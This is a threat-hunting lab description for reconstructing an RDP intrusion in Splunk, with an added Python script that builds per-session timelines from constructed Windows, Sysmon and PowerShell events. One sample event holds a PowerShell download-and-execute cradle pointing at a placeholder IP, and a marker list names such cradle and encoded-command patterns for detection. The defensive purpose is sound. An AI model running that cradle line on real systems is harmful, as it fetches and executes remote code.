Midnight RDP

Midnight RDP is a blue team lab in the Threat Hunting category. It uses Splunk and ELK as tooling and covers the following ATT&CK tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Lateral Movement, Command and Control.

Learning Objectives

Reconstruct the timeline of a sophisticated intrusion by correlating Windows event, Sysmon, and PowerShell logs in Splunk, identifying RDP-based initial access, persistence, privilege escalation, and command and control (C2).
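The correlation the objective describes, as an added example that is not part of the lab or its Splunk content: a small Python correlator that groups Windows Security, Sysmon and PowerShell events into RDP sessions and labels each event with the ATT&CK tactic it evidences. The sample records are constructed, and their field names (EventCode, Logon_Type, Account_Name, Source_Network_Address, Image, ScriptBlockText, Task_Name) are assumptions modelled on what a Splunk Windows add-on typically extracts; real field names depend on the add-on and on classic versus XML event rendering.

```python
"""Correlate RDP logons, Sysmon process creation and PowerShell script-block
events into per-session timelines (added example, constructed sample data)."""
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10            # 4624 Logon_Type 10 = RemoteInteractive (RDP)
SESSION_WINDOW = timedelta(hours=2)

# Substrings in a PowerShell script block that suggest a download cradle or an
# encoded payload. Indicative only; tune against your own baseline.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
                  "frombase64string", "-enc", "-encodedcommand")

# Constructed sample events (not real telemetry). Field names are assumptions.
SAMPLE_EVENTS = [
    {"_time": "2024-03-10T23:58:02", "host": "WS01", "EventCode": 4624,
     "Logon_Type": 10, "Account_Name": "jdoe", "Source_Network_Address": "10.0.5.23"},
    {"_time": "2024-03-10T23:58:40", "host": "WS01", "EventCode": 1,      # Sysmon
     "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"_time": "2024-03-10T23:59:15", "host": "WS01", "EventCode": 4104,   # PowerShell
     "User": "CORP\\jdoe",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"_time": "2024-03-11T00:01:10", "host": "WS01", "EventCode": 4698,   # task created
     "Account_Name": "jdoe", "Task_Name": "\\Updater"},
    {"_time": "2024-03-11T09:00:00", "host": "WS02", "EventCode": 4624,   # console logon
     "Logon_Type": 2, "Account_Name": "admin", "Source_Network_Address": "-"},
    {"_time": "2024-03-11T09:00:30", "host": "WS02", "EventCode": 1,
     "User": "CORP\\admin", "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def _user(ev):
    """Normalise 'CORP\\jdoe' and 'jdoe' to the same key."""
    raw = ev.get("Account_Name") or ev.get("User") or ""
    return raw.split("\\")[-1].lower()


def _ts(ev):
    return datetime.fromisoformat(ev["_time"])


def classify(ev):
    """Map one event to the ATT&CK tactic it evidences, or None if not of interest."""
    code = ev.get("EventCode")
    if code == 4624 and ev.get("Logon_Type") == RDP_LOGON_TYPE:
        return "Initial Access / Lateral Movement (RDP logon, T1021.001)"
    if code == 1:                        # Sysmon process creation
        return "Execution (process create)"
    if code == 4104:                     # PowerShell script block logging
        text = ev.get("ScriptBlockText", "").lower()
        if any(m in text for m in CRADLE_MARKERS):
            return "Command and Control (PowerShell download cradle, T1059.001)"
        return "Execution (PowerShell)"
    if code == 4698:                     # scheduled task created
        return "Persistence (scheduled task, T1053.005)"
    if code == 4672:                     # special privileges assigned at logon
        return "Privilege Escalation (special privileges at logon)"
    return None


def build_timeline(events):
    """Every 4624/type-10 logon opens a session keyed by (host, user); later
    events by that user on that host within SESSION_WINDOW attach to it.
    Caveat: with NLA enabled an RDP logon is usually preceded by a type-3
    (network) 4624, and a reconnect to an existing session shows as type 7;
    neither opens a session here."""
    sessions = []
    for ev in sorted(events, key=_ts):
        tactic = classify(ev)
        if tactic is None:
            continue
        entry = {"time": ev["_time"], "event_code": ev["EventCode"], "tactic": tactic}
        if ev["EventCode"] == 4624:
            sessions.append({"host": ev["host"], "user": _user(ev),
                             "source_ip": ev.get("Source_Network_Address"),
                             "start": _ts(ev), "entries": [entry]})
            continue
        for s in reversed(sessions):     # most recent matching session wins
            if (s["host"] == ev["host"] and s["user"] == _user(ev)
                    and s["start"] <= _ts(ev) <= s["start"] + SESSION_WINDOW):
                s["entries"].append(entry)
                break
    return sessions


if __name__ == "__main__":
    for s in build_timeline(SAMPLE_EVENTS):
        print(f"RDP session on {s['host']} as {s['user']} from {s['source_ip']}")
        for e in s["entries"]:
            print(f"  {e['time']}  {e['event_code']:>5}  {e['tactic']}")
```

Running it prints one session (WS01, jdoe, from 10.0.5.23) with the logon, cmd.exe launch, download-cradle script block and scheduled-task creation in order; the console logon on WS02 is not RDP and so produces nothing. In Splunk the equivalent starting point is a search on EventCode=4624 with the logon-type field equal to 10, then joining Sysmon EventCode=1 and PowerShell EventCode=4104 by host and user in the same time window (exact field names vary with the add-on and event rendering).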

Categories: Threat Hunting.

MITRE ATT&CK Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Lateral Movement, Command and Control.

Tools: ELK, Splunk.

Difficulty: hard.